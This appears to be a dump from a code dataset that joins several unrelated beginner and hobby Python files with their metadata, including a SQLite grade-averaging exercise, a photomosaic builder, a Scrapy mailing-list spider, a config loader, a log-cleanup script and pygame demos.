Mai and Daniel Keriazis\n#SoftDev1 pd7\n#K16 No Trouble\n#2018-10-04\n\nimport sqlite3 # Enable control of an sqlite database\nimport csv # Facilitates CSV I/O\n\nDB_FILE=\"database.db\"\n\ndb = sqlite3.connect(DB_FILE) # Open if file exists, otherwise create\nc = db.cursor() # Facilitate db ops\n\ncounts = {}\ntotals = {}\naverages = {}\nnames = {}\n\ncommand = \"SELECT name,code,mark,courses.id FROM courses,peeps WHERE courses.id = peeps.id\"\nc.execute(command)\n\nfor i in c.fetchall(): # Get output of SELECT statement\n name, code, mark, student = i\n if student not in counts:\n counts[student] = 0\n totals[student] = 0\n counts[student] += 1\n totals[student] += mark\n names[student] = name\n\n# Iteratre through all student ids and add them to the averages dict\nfor student in counts:\n total = totals[student]\n count = counts[student]\n averages[student] = round(total / count, 1) # Calculate average\n print(names[student], student, averages[student])\n\n# Create table peeps_avg with unique ids corresponding to student averages\nc.execute(\"CREATE TABLE peeps_avg (id INT PRIMARY KEY, avg INT)\")\n\n# Add rows to peeps_avg with id and avg\nfor student in averages:\n c.execute(\"INSERT INTO peeps_avg VALUES ({id}, {avg})\" # Add new row\n 
.format(id=student, avg=averages[student])) # Use proper values\n\ndb.commit() # Save changes\ndb.close() # Close database\n","sub_path":"Work/16_csv2db/16_csv2db.py","file_name":"16_csv2db.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"545894605","text":"\"\"\"Classes\"\"\"\nimport datetime\n\nclass Device(object):\n    \"\"\"Device info\"\"\"\n    def __init__(self, name, mac):\n        self.name = name\n        self.mac = mac\n        self.ipv4 = \"\"\n        self.last_seen = datetime.datetime.now() - datetime.timedelta(days=1)\n        self.running_arping = False\n        self._online = False\n        self._broadcast_state_change = False\n        self._last_message = \"\"\n\n    def is_active(self, secs):\n        \"\"\"Returns a bool indicating if the Device has been active in the last secs seconds\"\"\"\n        active = self.last_seen + datetime.timedelta(seconds=secs) >= datetime.datetime.now()\n        return active\n\n    def seen(self, **kwargs):\n        \"\"\"\n        Updates last_seen to now(), which changes the status to Online\n        Optionally sets the ip\n        \"\"\"\n        self._set_online(True)\n        self.last_seen = datetime.datetime.now()\n        if 'ipv4' in kwargs:\n            self.ipv4 = kwargs['ipv4']\n\n    def unseen(self):\n        \"\"\"Updates the device status to be Offline\"\"\"\n        self._set_online(False)\n\n    def get_status(self):\n        \"\"\"Gets the status of the device. Statuses include Online, Offline, Arping\"\"\"\n        if self.running_arping:\n            return \"Arping\"\n        else:\n            if self._online:\n                return \"Online\"\n            else:\n                return \"Offline\"\n\n    def get_status_message(self, **kwargs):\n        \"\"\"\n        Gets a status message if the active status has changed.\n        Once the message is generated, calling this function subsequent times will return \"\"\n        unless the active status is changed or the optional param 'override' is True\n        \"\"\"\n        message = \"\"\n        override = 'override' in kwargs and kwargs['override']\n        if self._broadcast_state_change or override:\n            self._broadcast_state_change = False\n            message = self.name + \" is \"\n            if self._online:\n                message += \"online!\"\n            else:\n                message += \"gone!\"\n\n            # if the message is the same as the last time someone asked, don't send it\n            if self._last_message == message and not override:\n                message = \"\"\n            else:\n                self._last_message = message\n\n        return message\n\n    def _set_online(self, is_online):\n        \"\"\"sets online status\"\"\"\n        if is_online != self._online:\n            self._broadcast_state_change = True\n        self._online = is_online\n","sub_path":"psb/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"258846110","text":"import unittest\nimport HTMLTestRunner\n#load all test cases and run them\ndef allcase():\n    casedir=\"D:\\liang\"\n    testcase=unittest.TestSuite()\n    discover=unittest.defaultTestLoader.discover(casedir,pattern=\"test_*.py\",top_level_dir=None)\n    testcase.addTests(discover)# load the discover suite directly\n    print(testcase)\n    return testcase\n\nif __name__ ==\"__main__\":\n    outfile = open(\"d:\\\\liang\\\\testcase\\\\report\\\\report.html\", \"w\")\n    runner1 = HTMLTestRunner.HTMLTestRunner(\n        stream=outfile,\n        title='Automated test report',\n        description='Test case execution results'\n    )\n\n    runner1.run(allcase())\n    outfile.close()\n","sub_path":"加载所有用例执行.py","file_name":"加载所有用例执行.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"158224934","text":"\"\"\"Finds a directory or file inside the current project.\"\"\"\nfrom . 
import DodoCommand\nfrom dodo_commands.framework.config import (CommandPath, get_project_dir)\nimport os\nimport sys\n\n\nclass Command(DodoCommand): # noqa\n def add_arguments_imp(self, parser): # noqa\n \"\"\"\n Entry point for subclassed commands to add custom arguments.\n \"\"\"\n parser.add_argument(\n 'what',\n nargs='?',\n help=(\n 'Print the value of /ROOT/<what>_dir. For example: ' +\n '\"dodo which src\" prints the value of /ROOT/src_dir.')\n )\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n '--config',\n action=\"store_true\",\n help='Print where the config file is')\n group.add_argument(\n '--script',\n help='Print where the dodo command script with given name is')\n\n def handle_imp(self, what, config, script, **kwargs):\n if config:\n print(\n os.path.join(\n get_project_dir(), \"dodo_commands\", \"res\", \"config.yaml\"\n )\n )\n elif script:\n command_path = CommandPath(self.config)\n for item in command_path.items:\n script_path = os.path.join(\n item.full_path, script + \".py\"\n )\n if os.path.exists(script_path):\n sys.stdout.write(script_path + \"\\n\")\n elif what:\n sys.stdout.write(self.get_config(\"/ROOT/%s_dir\" % what) + \"\\n\")\n else:\n sys.stdout.write(self.get_config(\"/ROOT/project_name\") + \"\\n\")\n","sub_path":"dodo_commands/extra/standard_commands/which.py","file_name":"which.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"210779770","text":"from PIL import Image\r\nfrom os import listdir, path\r\n\r\nclass Mosaic(object):\r\n \"\"\"A Mosaic class that can create, store and save a photomosaic image.\"\"\"\r\n \r\n def __init__(self, path):\r\n \"\"\"Create a picture database that stores all images from directory \r\n specified by path.\"\"\"\r\n \r\n self.PICTURE_DATABASE = listdir(path)\r\n self.path = path\r\n self.mosaic = None\r\n \r\n def _images_database(self, dirlist):\r\n \"\"\"Return a list of lists with images from dirlist \r\n as the first element in nested lists and their average colour value \r\n as the second element. i.e. \r\n [[image.jpg, _colour_average], [image2, _colour_average]]\r\n -dirlist is a list of filenames for images.\"\"\"\r\n \r\n outer = []\r\n for i in xrange(len(dirlist)):\r\n inner = []\r\n image = Image.open(path.join(self.path, dirlist[i]))\r\n inner.append(image)\r\n inner.append(_colour_average(image))\r\n outer.append(inner)\r\n return outer\r\n \r\n def _closest_match(self, pic, images):\r\n \"\"\"Return an image from database, with closest average colour value\r\n to pic's average colour value, resized to match pic.\r\n -pic is a picture\r\n -images is a list database of lists containing\r\n [image, colour average of image]\r\n \"\"\"\r\n \r\n pic_col = _colour_average(pic)\r\n # Store the image with the smallest _distance from pic in a list \r\n # to resize\r\n closest = min([[_distance(pic_col, image[1]), image[0]]\r\n for image in images])\r\n resized = closest[1].resize(pic.size)\r\n return resized\r\n \r\n def create_mosaic(self, filename, min_size):\r\n \"\"\"Create and store a photomosaic version of a single picture specified\r\n by filename. min_size determines the smallest height or width of \r\n the picture to start replacing with pictures in PICTURE_DATABASE.\"\"\"\r\n \r\n def _create_mosaic(image, min_size, database):\r\n \"\"\"Create and store a photomosaic version of image. 
min_size \r\n            determines the smallest height or width of the picture to start \r\n            replacing with pictures from database.\"\"\"\r\n        \r\n            size = image.size\r\n            width, height = size[0], size[1]\r\n            if width < min_size or height < min_size:\r\n                # Find an image from database with smallest distance\r\n                best_match = self._closest_match(image, database)\r\n                return best_match\r\n            else:\r\n                # Recurse on four different quadrants\r\n                q1 = (0, 0, (width / 2), (height / 2))\r\n                q2 = ((width / 2), 0, width, (height / 2))\r\n                q3 = (0, (height / 2), (width / 2), height)\r\n                q4 = ((width / 2), (height / 2), width, height) \r\n                image.paste(_create_mosaic(image.crop(q1), min_size, \r\n                                           database), q1)\r\n                image.paste(_create_mosaic(image.crop(q2), min_size,\r\n                                           database), q2)\r\n                image.paste(_create_mosaic(image.crop(q3), min_size,\r\n                                           database), q3)\r\n                image.paste(_create_mosaic(image.crop(q4), min_size,\r\n                                           database), q4)\r\n                return image\r\n        \r\n        pic = Image.open(filename)\r\n        database = self._images_database(self.PICTURE_DATABASE)\r\n        self.mosaic = _create_mosaic(pic, min_size, database)\r\n        return self.mosaic\r\n\r\n    def save_as(self, filename):\r\n        \"\"\"Save the stored photomosaic as a jpg file named filename.\"\"\"\r\n        \r\n        if self.mosaic:\r\n            self.mosaic.save(filename, 'JPEG')\r\n\r\n#====START: Helper Functions for importing============================\r\ndef _colour_average(image):\r\n    \"\"\"Return a tuple that contains the average RGB value of image.\"\"\"\r\n    \r\n    histo = image.histogram()\r\n    average_red, average_green, average_blue = 0, 0, 0\r\n    size = image.size[0] * image.size[1]\r\n    for i in xrange(256):\r\n        average_red += (i * histo[:256][i])\r\n        average_green += (i * histo[256:512][i])\r\n        average_blue += (i * histo[512:][i])\r\n    return (average_red / size, average_green / size, \r\n            average_blue / size)\r\n\r\ndef _distance(col1, col2):\r\n    \"\"\"Return the Euclidean distance between col1 and col2. 
col1 and col2 are both\r\n tuples representing RGB colour values.\"\"\"\r\n \r\n red1, blue1, green1 = col1[0], col1[1], col1[2]\r\n red2, blue2, green2 = col2[0], col2[1], col2[2]\r\n distance = (((red1 - red2) ** 2) + ((blue1 - blue2) ** 2) + \\\r\n ((green1 - green2) ** 2)) ** 0.5\r\n return distance\r\n#====END========================================================\r\n","sub_path":"class projects/CSC148/mosaic/mosaic.py","file_name":"mosaic.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"137018945","text":"import extract_scores as es\nimport sys\nimport logger\nimport random\nimport os\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\nfrom math import sqrt\nimport datetime\n\nFILE_LOG = 'ssr_%s.txt'\nsys.stdout = logger.Logger(FILE_LOG % datetime.datetime.now().strftime('%Y%m%d%H%M%S'))\n\n# if a course has less than 5 pre-courses, it fails in predicting\nMIN_NUM_PRE_COURSES = 5\n# if the card of training set is less than 10, it fails in predicting\nMIN_NUM_TRAINING_SET_ITEMS = 5\n# if the student has attended less than 100% of the previous courses that the target student has for the target course,\n# it fails in predicting\nMIN_OVERLAPPING_RATE = 1\nPERCENTAGE_TRAIN_SET = 0.99\nFILE_PREFIX_TEST = '../new/ssr/test_course_'\nFILE_PREFIX_TRAIN = '../new/ssr/train_course_'\n\n\ndef split_train_test():\n train_idx = random.sample(range(len(es.m_students)), int(PERCENTAGE_TRAIN_SET * len(es.m_students)))\n test_idx = list(set(range(len(es.m_students))) - set(train_idx))\n return train_idx, test_idx\n\n\ndef get_pre_courses(student, course):\n \"\"\"\n Get the previous courses that a target student has taken before the target course.\n :param student: the index of the target student\n :param course: the index of the target course\n :return: the previous courses list or None indicating the target student has not taken the target course\n \"\"\"\n if es.m_scores[student, course] == 0 or es.m_terms[student, course] == 1:\n return None\n this_student_courses = es.m_scores[student, :].nonzero()[1]\n this_student_terms = [es.m_terms[student, i] for i in this_student_courses]\n assert len(this_student_courses) == len(this_student_terms)\n this_student_courses_terms = [{'c': this_student_courses[i], 't': this_student_terms[i]}\n for i in range(len(this_student_courses))]\n this_student_courses_terms.sort(key=lambda i: i['t'])\n pre_courses = []\n this_term = this_student_terms[this_student_courses.tolist().index(course)]\n for item in this_student_courses_terms:\n if item['t'] < this_term:\n pre_courses.append(item['c'])\n else:\n break\n return set(pre_courses)\n\n\ndef run_ssr_ridge(train_idx, student, course):\n \"\"\"\n Predict the score of a target course for a target student using the method of \"Student Specific Regression (SSR)\".\n The basic notion of the method is to find out all the other students that has taken a sufficient number of previous\n courses same as the target student, and to use these historical data for training the model. 
This method may fail if\n there is not sufficient number of previous courses, or there is not sufficient number of students that satisfy this\n condition.\n :param train_idx: the list of index of training set (i.e., student id's in the training set)\n :param student: the index of the target student\n :param course: the index of the target course\n :return: the predicted score or -1 indicating failure in predicting\n \"\"\"\n valid_train_index = []\n pre_course = get_pre_courses(student, course)\n if pre_course is None or len(pre_course) < MIN_NUM_PRE_COURSES:\n return -1\n for i in train_idx:\n pre_course_i = get_pre_courses(i, course)\n if pre_course_i is not None and pre_course.issubset(pre_course_i):\n valid_train_index.append(i)\n # print(valid_train_index)\n valid_train_x = es.m_scores[valid_train_index, :][:, list(pre_course)].todense()\n valid_train_y = es.m_scores[valid_train_index, :][:, course].todense()\n # print(valid_train_x, valid_train_y)\n if len(valid_train_x) < MIN_NUM_TRAINING_SET_ITEMS:\n return -1\n valid_train_y = np.transpose(valid_train_y).flat\n reg = linear_model.RidgeCV(alphas=[10.0, 100.0, 1000.0, 10000.0, 100000.0])\n reg.fit(valid_train_x, valid_train_y)\n predicted_y = reg.predict(es.m_scores[student, :][:, list(pre_course)])\n return predicted_y\n\n\nif __name__ == '__main__':\n training, testing = split_train_test()\n total_predicted = []\n total_actual = []\n for idx, s in enumerate(testing):\n s_predicted = []\n s_actual = []\n print('Predicting student %d: %.2f%% from total' % (s, idx/len(testing)*100))\n for c in es.m_scores[s, :].nonzero()[1]:\n predicted = run_ssr_ridge(training, s, c)\n if predicted == -1:\n continue\n actual = es.m_scores[s, c]\n s_predicted.append(predicted)\n s_actual.append(actual)\n print(' Succeeded on student %d, course %d: predicted: %.1f; actual: %.1f' % (s, c, predicted, actual))\n if len(s_predicted) > 0:\n rms = sqrt(mean_squared_error(s_actual, s_predicted))\n mae = mean_absolute_error(s_actual, s_predicted)\n print('RMSE, MAE for student %d on %d courses: %f' % (s, len(s_predicted), rms))\n else:\n print('Failed predicting student %d' % s)\n total_predicted += s_predicted\n total_actual += s_actual\n total_rmse = sqrt(mean_squared_error(total_actual, total_predicted))\n total_mae = mean_absolute_error(total_actual, total_predicted)\n print('Total RMSE: %f' % total_rmse)\n print('Total MAE: %f' % total_mae)","sub_path":"src/student_specific_regression.py","file_name":"student_specific_regression.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"552439978","text":"# -*- coding: utf-8 -*-\nimport logging\n\nimport scrapy\n\ntry:\n import urlparse\n from urllib import urlencode\nexcept: # For Python 3\n import urllib.parse as urlparse\n from urllib.parse import urlencode\n\n\n# url_parts = list(urlparse.urlparse(url))\n# query = dict(urlparse.parse_qsl(url_parts[4]))\n# query.update(params)\n#\n# url_parts[4] = urlencode(query)\n#\n# print(urlparse.urlunparse(url_parts))\n\n\nclass JythonMlSpider(scrapy.Spider):\n \"\"\"Jython ML Spider\"\"\"\n name = 'jython_ml'\n allowed_domains = [\"sourceforge.net\"]\n start_urls = ['https://sourceforge.net/p/jython/mailman/jython-users/?limit=%s&style=threaded']\n\n def __init__(self, page_size=30, *args, **kwargs):\n self._page_size = page_size\n self.start_urls = map(lambda x: x % self._page_size, self.start_urls)\n\n super(JythonMlSpider, self).__init__(*args, **kwargs)\n\n def 
parse(self, response):\n        origin = response.url\n\n        # Parse other pages\n        logging.info(\"Parse pagination for: %s\" % origin)\n\n        for page_list in response.css('div.page_list a.pager_link'):\n            logging.info(\"Process page link `%s' for: %s\" % (page_list.extract(), origin))\n\n            content = page_list.css('::text').extract()[0].strip()\n            url = page_list.css('::attr(href)').extract()[0]\n            url = response.urljoin(url)\n\n            if content == u'>':\n                yield scrapy.Request(url, callback=self.parse)\n                break # Only once!\n\n        # Parse threads\n        logging.info(\"List threads in: %s\" % origin)\n        for href in response.css('table.threaded-list a::attr(href)'):\n            full_url = response.urljoin(href.extract())\n            parsed = urlparse.urlparse(full_url)\n\n            no_frag = u\"%s://%s%s\" % (parsed.scheme, parsed.netloc, parsed.path)\n\n            logging.info(\"Enqueue thread `%s' for %s\" % (no_frag, origin))\n            yield scrapy.Request(no_frag, callback=self.parse_thread)\n\n    def parse_thread(self, response):\n        origin = response.url\n        logging.info(\"Parse thread in: %s\" % origin)\n\n        for message in response.css('div.thread-message'):\n            message_url = message.css('.email-header a::attr(href)').extract()[0]\n            parsed = urlparse.urlparse(message_url)\n            discussion_id = parsed.path.split('/')[-1]\n            message_id = message.css('table::attr(id)').extract()[0]\n            title = message.css('.email-header a::text').extract()[0]\n            meta = message.css('.email-header small').extract()[0]\n            body = message.css('.email-body pre::text').extract()[0]\n\n            yield {\n                'discussion_id': discussion_id,\n                'message_id': message_id,\n                'title': title,\n                'meta': meta,\n                'body': body,\n            }\n","sub_path":"jython_ml.py","file_name":"jython_ml.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"543003535","text":"file = open(\"teams.txt\",\"rt\")\r\nteam = \"nonempty\"\r\nwhile (team != \"\"):\r\n    team = file.readline()\r\n    if (team != \"\"): print (team[:-1]) #get rid of extra newline character\r\n    #print(len(team))\r\n    #print(team[2:])\r\nfile.close()\r\n#-------------------------------------------------------------------------------------------------------------------\r\nlist=['α','β','g','e'] #list = ['florida','clemson','duke']\r\nlist.append('114')\r\n#print ('this is the list:',list)\r\nprint()\r\nfile=open ('teams.txt','wt')#writes a fresh list to the file every time; with mode 'a' it appends every time \r\nfor j in list:\r\n    file.write(j)\r\nfile.write('\\n') #for j in list:file.write(j+'\\n')->writes them vertically (one per line) in the file\r\nfile.close()\r\n\r\n#file = open(\"teams.txt\",\"rt\")\r\n#team = file.readlines()\r\n#print(team)\r\n#print()\r\n#print(team[35:])\r\n#file.close()\r\n","sub_path":"python33/arxeia_diaxeirisi/arxeio_listas_teams.py","file_name":"arxeio_listas_teams.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"611808113","text":"# BSD Licence\n# Copyright (c) 2010, Science & Technology Facilities Council (STFC)\n# All rights reserved.\n#\n# See the LICENSE file in the source distribution of this software for\n# the full license text.\n\n\"\"\"\nmetaconfig\n----------\n\nWe want to do:\n\n{{{\nimport metaconfig\n\n# Config is a ConfigParser instance (or subclass)\n# Returns the lowest level config file available (e.g. 
if __name__ == 'foo.bar.baz' and there is a config \n# defined for 'foo.bar' use that.\nconfig = metaconfig.get_config(__name__)\n}}}\n\n\nThese options are bootstraped on entry into Python as:\n\n{{{\nimport metaconfig\n\nmetaconfig.add_config_file(name, path)\nmetaconfig.add_config(name, configParser)\nmetaconfig.metaconfig(metaconfig)\nmetaconfig.metaconfig_file(metaconfig_file)\nmetaconfig.from_argv()\n\nor something like that\n}}}\n\n\n\"\"\"\n\nimport sys, os\nimport ConfigParser\nimport re\n\nimport logging\nimport logging.config\nlog = logging.getLogger(__name__)\n\nclass Error(Exception):\n pass\n\nDEFAULT_CONFIG_PARSER = ConfigParser.ConfigParser\n\nclass MetaConfig(object):\n def __init__(self):\n self._configs = {}\n\n def add_config_file(self, name, path, ConfigClass=DEFAULT_CONFIG_PARSER):\n\n log.info('Adding config %s from path %s' % (name, path)) \n conf = ConfigClass()\n conf.read([path])\n\n return self.add_config(name, conf)\n\n\n def add_config_fh(self, name, fileobj, ConfigClass=DEFAULT_CONFIG_PARSER):\n\n log.info('Adding config %s from file object' % name)\n conf = ConfigClass()\n conf.readfp(fileobj)\n\n return self.add_config(name, conf)\n\n def add_config(self, name, config_parser):\n if name in self._configs:\n Error(\"Config %s already exists\" % name)\n else:\n config_parser.__config_name__ = name\n self._configs[name] = config_parser\n\n log.info('Config %s added' % name)\n\n return config_parser\n\n def get_config(self, name, ConfigClass=DEFAULT_CONFIG_PARSER, inherit=True):\n log.debug('Requested config %s, inherit=%s' % (name, inherit))\n\n if inherit:\n parts = name.split('.')\n while parts:\n name1 = '.'.join(parts)\n log.debug(\"Looking for config %s\" % name1)\n try:\n config = self._configs[name1]\n log.debug(\"Selected config %s\" % name1)\n return config\n except KeyError:\n parts = parts[:-1]\n \n if name in self._configs:\n log.debug(\"Selecting config %s\" % name)\n return self._configs[name]\n else:\n config = self.add_config(name, ConfigClass())\n log.debug(\"New config %s\" % name)\n return config\n \n\n @classmethod\n def from_config(klass, config_parser):\n mf = klass()\n\n mf._setup_includes(config_parser)\n mf._setup_logging(config_parser)\n mf._parse_nested_configs(config_parser)\n mf._parse_external_configs(config_parser)\n\n return mf\n\n @classmethod\n def from_config_file(klass, config_file):\n cnf = DEFAULT_CONFIG_PARSER()\n cnf.read(config_file)\n\n return klass.from_config(cnf)\n\n @classmethod\n def from_config_fh(klass, config_fh):\n cnf = DEFAULT_CONFIG_PARSER()\n cnf.readfp(config_fh)\n \n return klass.from_config(cnf)\n\n\n \n def _parse_nested_configs(self, config_parser):\n \"\"\"\n Parse configs embedded in the metaconfig file.\n \"\"\"\n if not config_parser.has_option('metaconfig', 'configs'):\n return\n\n configs = config_parser.get('metaconfig', 'configs').split()\n D = {}\n for section in config_parser.sections():\n mo = re.match(r'(.+?):(.+)', section)\n if not mo:\n continue\n prefix, ssec = mo.groups()\n D.setdefault(prefix, []).append(ssec)\n\n\n for config in configs:\n cp = DEFAULT_CONFIG_PARSER()\n for ssec in D[config]:\n sec = '%s:%s' % (config, ssec)\n\n if ssec.lower() == 'default':\n defaults = cp.defaults()\n for option in config_parser.options(sec):\n defaults[option] = config_parser.get(sec, option,\n raw=True)\n else:\n cp.add_section(ssec)\n for option in config_parser.options(sec):\n cp.set(ssec, option, config_parser.get(sec, option, \n raw=True))\n\n self.add_config(config, cp)\n\n def 
_parse_external_configs(self, config_parser):\n        \"\"\"\n        Parse external config files referenced in metaconfig.conf.\n        \"\"\"\n        if not config_parser.has_option('metaconfig', 'config-files'):\n            return\n\n        secname = config_parser.get('metaconfig', 'config-files')\n        for opt in config_parser.options(secname):\n            filename = config_parser.get(secname, opt)\n            log.info('Reading external config %s from file %s' %\n                     (opt, filename))\n            self.add_config_file(opt, filename)\n        \n\n    def _setup_includes(self, config_parser):\n        \"\"\"\n        Include external metaconfig files.\n\n        \"\"\"\n        if not config_parser.has_option('metaconfig', 'include'):\n            return\n\n        includes = config_parser.get('metaconfig', 'include').split()\n        for include in includes:\n            log.info(\"Including metaconfig: %s\" % include)\n            config_parser.read(include)\n        \n\n    def _setup_logging(self, config_parser):\n        \"\"\"\n        Initialise logging from a nested config.\n\n        \"\"\"\n        if not config_parser.has_option('metaconfig', 'logging'):\n            return\n\n        logging_file = config_parser.get('metaconfig', 'logging')\n        logging_file = os.path.expanduser(logging_file)\n\n        logging.config.fileConfig(logging_file)\n        log.info('Logging configuration initialised from %s' % logging_file)\n","sub_path":"metaconfig/mconf.py","file_name":"mconf.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"290510715","text":"import pygame\n\npygame.init()\n# Create the game window\nscreen = pygame.display.set_mode((480, 700))\n\n# Draw the background image\n# Load the image\nbg = pygame.image.load(\"./素材/background.png\")\n# Draw the image\nscreen.blit(bg, (0, 0))\n# screen.blit(bg, (100, 100))\n# Update the screen display\n# pygame.display.update()\n\nhero = pygame.image.load(\"./素材/me1.png\")\n\nscreen.blit(hero, (150, 300))\n\n# Update the screen display\npygame.display.update()\n\n# Create a clock object\nclock = pygame.time.Clock()\n\n#record the plane's initial position\nhero_rect = pygame.Rect(150, 300, 102, 126)\n\nwhile True:\n\n    # Sets how often the code inside the loop body runs\n    clock.tick(60)\n\n    # Update the plane's position\n    hero_rect.y -= 3\n\n    # Check the plane's position\n    if hero_rect.y <= -126:\n\n        hero_rect.y = 700\n\n    # Redraw the screen\n    screen.blit(bg, (0, 0))\n\n    # Draw the image\n    screen.blit(hero, hero_rect)\n\n    # Update the screen\n    pygame.display.update()\n\npygame.quit()","sub_path":"项目/飞机大战/6.循环飞行.py","file_name":"6.循环飞行.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"238225972","text":"#!/usr/bin/env python3\nimport sys\nimport os\n\ndef main(path, num_to_keep, split_by):\n    traces_dir = os.environ[\"HOME\"] + \"/\" + path\n    os.chdir(traces_dir)\n    dirs = os.listdir(\".\")\n\n    while len(dirs) > 0:\n        target = dirs.pop()\n\n        if \"xslt\" in target:\n            continue\n\n        process_list = []\n        process_list.append(target)\n        keyword = target.split(split_by)[2]\n\n        tmp_dirs = dirs.copy()\n        for name in dirs:\n            if keyword in name:\n                process_list.append(name)\n                tmp_dirs.remove(name)\n\n        dirs = tmp_dirs\n\n        process_list = sorted(process_list, key=str.lower)\n\n        while len(process_list) > num_to_keep:\n            name = process_list.pop(0)\n            print(\"rm \" + name)\n            os.popen(\"rm -rf \" + name).read()\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 4:\n        print(\"./clean_log.py <PATH> <# to keep> <split_by>\")\n        exit(1)\n    main(sys.argv[1], int(sys.argv[2]), sys.argv[3])\n","sub_path":"scripts/clean_log.py","file_name":"clean_log.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"469192063","text":"#!/usr/bin/env python3\n\nimport 
os\nimport re\nimport sys\nimport tkinter.filedialog\n\n\nALLOWED_EXTENSIONS = ('.css', '.js')\n\n\ndef minify(filename):\n \"\"\"(str)-> None\n Strip spaces the content of the file at the given\n filename and write to a new file named\n filename.min.original_extension\n \"\"\"\n\n basename, ext = os.path.splitext(os.path.basename(filename))\n\n if ext not in ALLOWED_EXTENSIONS:\n print(\"ERROR: unsupported file format\")\n return\n\n pattern = re.compile(r'([\\:\\{\\};])\\s+')\n pattern2 = re.compile(r'[\\s;]([\\{\\}])')\n\n try:\n with open(filename, 'r') as file_to_minify:\n minified_content = pattern.sub(r'\\1', file_to_minify.read())\n minified_content = pattern2.sub(r'\\1', minified_content)\n except IOError:\n print('\\nAn error occurred while processing the file.\\n'\n 'Please verify that you have selected the correct file.\\n')\n\n # add 'min' to the original filename\n new_name = '{}.min{}'.format(basename, ext)\n\n with open(new_name, 'w') as new_file:\n new_file.write(minified_content)\n\n\ndef main():\n if len(sys.argv) == 2:\n to_minify = sys.argv[1]\n else:\n to_minify = tkinter.filedialog.askopenfilename()\n\n minify(to_minify)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tinycss/minifier.py","file_name":"minifier.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"438597496","text":"#Credit the Invent With Python book (http://inventwithpython.com)\n#for doRectsOverlap and isPointInsideRect functions\n\n#used to detect collisions in our game\ndef doRectsOverlap(rect1, rect2):\n for a, b in [(rect1, rect2), (rect2, rect1)]:\n # Check if a's corners are inside b\n if ((isPointInsideRect(a.left, a.top, b)) or\n (isPointInsideRect(a.left, a.bottom, b)) or\n (isPointInsideRect(a.right, a.top, b)) or\n (isPointInsideRect(a.right, a.bottom, b))):\n return True\n\n return False\n\n#used the by the doRectsOverlap function (won't be called directly from game code)\ndef isPointInsideRect(x, y, rect):\n if (x > rect.left) and (x < rect.right) and (y > rect.top) and (y < rect.bottom):\n return True\n else:\n return False\n\nimport pygame, sys\npygame.init()\nscreen = pygame.display.set_mode([640,480])\nblack = [0, 0, 0]\n\n#the game's variables\nball_x = 50\nball_y = 50\nball_radius = 10\nball_color = [222,50,50]\nball_speed_x = 3\nball_speed_y = 5\n\npaddle_x = 200\npaddle_y = 440\npaddle_width = 60\npaddle_height = 20\npaddle_color = [20,180,180]\npaddle_speed = 20\n\nmyfont = pygame.font.SysFont(\"Arial\", 15)\nscore = 0\n\nrunning = True\n#game loop\nwhile running:\n for event in pygame.event.get():\n #check if you've exited the game\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.MOUSEMOTION:\n coordinates = pygame.mouse.get_pos() #gives (x,y) coordinates\n paddle_x = coordinates[0] - paddle_width/2 #sets the paddle_x variable to the first item in coordinates\n #if the paddle is off the left side bring it back\n if paddle_x < 0:\n paddle_x = 0\n #if the paddle is off the right side bring it back \n if paddle_x > screen.get_width() - paddle_width:\n paddle_x = screen.get_width() - paddle_width\n\n #pause for 20 milliseconds\n pygame.time.delay(20)\n #make the screen completely white\n screen.fill(black)\n\n #move the ball\n ball_y = ball_y + ball_speed_y\n ball_x = ball_x + ball_speed_x\n #check if the ball is off the bottom of the screen\n if ball_y > screen.get_height():\n ball_y = 20\n score = 0\n #check if the ball hit the top of the 
screen\n if ball_y < ball_radius:\n ball_speed_y = -ball_speed_y\n #check if the ball hit the left side of the screen\n if ball_x < ball_radius:\n ball_speed_x = -ball_speed_x\n #check if the ball hit the right side of the screen\n if ball_x > screen.get_width() - ball_radius:\n ball_speed_x = -ball_speed_x\n\n #create imaginary rectangles around ball and paddle\n ball_rect = pygame.Rect(ball_x-ball_radius, ball_y-ball_radius, ball_radius*2,ball_radius*2) #circles are measured from the center, so have to subtract 1 radius from the x and y\n paddle_rect = pygame.Rect(paddle_x, paddle_y, paddle_width, paddle_height)\n #see if the rectangles overlap\n if doRectsOverlap(ball_rect, paddle_rect):\n #only bounce when the ball is moving down\n if ball_speed_y > 0:\n ball_speed_y = -ball_speed_y\n score = score + 1\n \n\n #draw everything on the screen\n score_label = myfont.render(str(score), 1, pygame.color.THECOLORS['white'])\n screen.blit(score_label, (10, 10))\n pygame.draw.circle(screen, ball_color, [ball_x, ball_y], ball_radius, 0)\n pygame.draw.rect(screen, paddle_color, 